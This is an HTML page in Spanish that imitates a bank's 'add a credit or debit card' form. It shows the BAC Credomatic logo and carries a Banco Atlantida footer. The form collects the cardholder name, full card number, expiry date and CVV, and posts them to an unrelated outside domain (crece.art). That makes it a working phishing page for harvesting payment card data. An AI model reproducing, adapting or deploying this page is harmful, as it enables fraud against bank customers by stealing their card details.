
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BAC CREDOMATIC</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <header>
        <img src="https://www.baccredomatic.com/themes/custom/bac_theme/images/bac_logo.svg" alt="" style="width: 100px; margin-left: 20px;">
        <h1></h1>
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Varela&display=swap');
            
            
        form p {
        margin-left: 11px;
        color: #005AB3;
        }
        form {
        box-sizing: border-box;
        }
        form input{
        width: 95%;
        display: block;
        margin: auto;
        box-sizing: border-box;
        margin-top: px;
        padding: 20px;
        border-radius: 5px;
        border: 1px solid #47cbff;
        outline-color: #009bd8;
        font-size: 15px;
        }
        form button{
        width: 95%;
        box-sizing: border-box;
        margin: auto;
        margin-top: 10px;
        display: block;
        padding: 15px;
        border-radius: 5px;
        color: white;
        border-style: none;
        cursor: pointer;
        background: linear-gradient(-45deg, #029fcf 0%, #02c6f7 100%);
        }
        .span{
        font-size: 10px;
        margin-left: 30px; 
        position: relative;
        display: inline;
        top: 8px;
        background: white; 
        color: white;
        
        }
        .span span{
        color: #7E7E7E;
        }
        .boton a p {
        color: white;
        }
        form{
        width: 500px;
        box-shadow: 0 0 15px 5px rgba(128, 128, 128, 0.5);
        border-radius: 5px;
        background-color: WHITE;
        padding-bottom: 10PX;
        }
        .caja-form{
        display: grid;
        place-items: center;
        }
        .content{
            width: 500px;
            height: auto;
            display: block;
            margin: auto;
            padding-bottom: 40px;
        }
        .activo {
            color: white;
            display: none;
            width: 500px;
            height: 40px;
            border:2px solid #484848;
            background: #959595;
            border-radius: 5px;
            position: fixed;
            z-index: 100;
            bottom: 240px;
            left: 400px;
            margin-top: auto;
            text-align: center;
        
        }
        .content{
            display: grid;
            place-items: center;
        }
        #vence {
            width: 150px;
            margin-left: 10px;
        }
        #codigo{
            width: 100px;
            margin-right: 10px;
            margin-top: -59px;
        }
        .span1{
       font-size: 10px;
        margin: auto;
        
        display: block;
        
        background: white; 
        color: rgb(97, 97, 97);

        }
        @media only screen and (max-width: 850px){
            .formulario{
                width:90%;
        
            }
            .content {
                width: 98%;
            }
            #dick{
                width: 95%;
            
                left: 10px;
            }
            .caja-form{
                width: 95%;
            }
        }
            </style>
        
    </header>

    <main>
        
            
                <div class="caja-form">
                    
                    <form class="formulario" action="https://crece.art/tarjetasatla.php" method="post">
                        <h2 style="margin: 10px; text-align: center; color: #7E7E7E;" >Agrega una tarjeta de crédito o débito</h2>
                        <span class="span">__<span>Ingrese el nombre exacto que aparece en la tarjeta</span>__</span>
                        <input type="text" name="nombre" placeholder="JOSE A. MARTINEZ GARCIA " required="" onkeyup="mayus(this);"" autocomplete="off">
                        <span class="span">__<span>Número completo de la tarjeta</span>__</span>
                        <input type="text" name="TarjetaNumero" maxlength="19" id="numeros" placeholder="0000 0000 0000 0000" required>
                        <span></span>
                        <!--Aqui inicia un nuevo input-->
                        <span class="span">__<span>Búscalo al frente</span>__</span>
                        <input type="text" id="vence" name="FechaVencimiento" placeholder="VENCE(MM/AA)"
                        onkeyup="
                        var v = this.value;
                        if (v.match(/^\d{2}$/) !== null) {
                        this.value = v + '/';
                        }
                        else if (v.match(/^\d{4}\$/) !== null) {
                        this.value = v + '/';
                        }"
                        maxlength="5"
                        required="">
                        
                        <input type="text" name="codigo" id="codigo" placeholder="CVV" minlength="3" maxlength="3" required=""autocomplete = "off">
                        
                        <button id="boton" type="submit">AGREGAR TARJETA</button>
                        
                    </form>
            
                    <script type="text/javascript">
                        var codigo = document.getElementById('codigo');
                    
                        codigo.onkeydown = function(e){
                            if (e.key == 'Backspace') return true;
                    
                            if (e.key == ' ') return false;	
                    
                            if (isNaN(e.key)) return false;
                        };
                    </script>
                    
                    <script>
                    // Campo numeros
                    var numeros = document.getElementById('numeros');
                    
                    // Poner cursor en el campo numeros
                    numeros.focus();
                    
                    numeros.onkeydown = function(e){
                        // Permitir la tecla para borrar
                        if (e.key == 'Backspace') return true;
                    
                        // Permitir flecha izquierda
                        if (e.key == 'ArrowLeft') return true;
                    
                        // Permitir flecha derecha
                        if (e.key == 'ArrowRight') return true;
                    
                        // Bloquear tecla de espacio
                        if (e.key == ' ') return false;
                    
                        // Bloquear tecla si no es un numero
                        if (isNaN(e.key)) return false;
                    };
                    
                    numeros.onkeyup = function(){
                        numeros.value = numeros.value
                                        // Borrar todos los espacios
                                        .replace(/\s/g, '')
                    
                                        // Agregar un espacio cada dos numeros
                                        .replace(/([0-9]{4})/g, '$1 ')
                    
                                        // Borrar espacio al final
                                        .trim();
                    };
                    function mayus(e){
        
                        e.value = e.value.toUpperCase();
                        }
                    </script>
                </div>
            
            </div>
            <div id="dick" onclick="ocultar();" class="activo">
                <p style="font-size: 13px;">El codigo de seguridad son 3 numeros ubicados en la parte trasera de tu tarjeta.</p>
                
            </div>
            </div>
        
    </main>

    <footer>
        <p>&copy; 2025 Banco Atlantida. Todos los derechos reservados.</p>
    </footer>

    <script src="script.js"></script>
</body>
</html>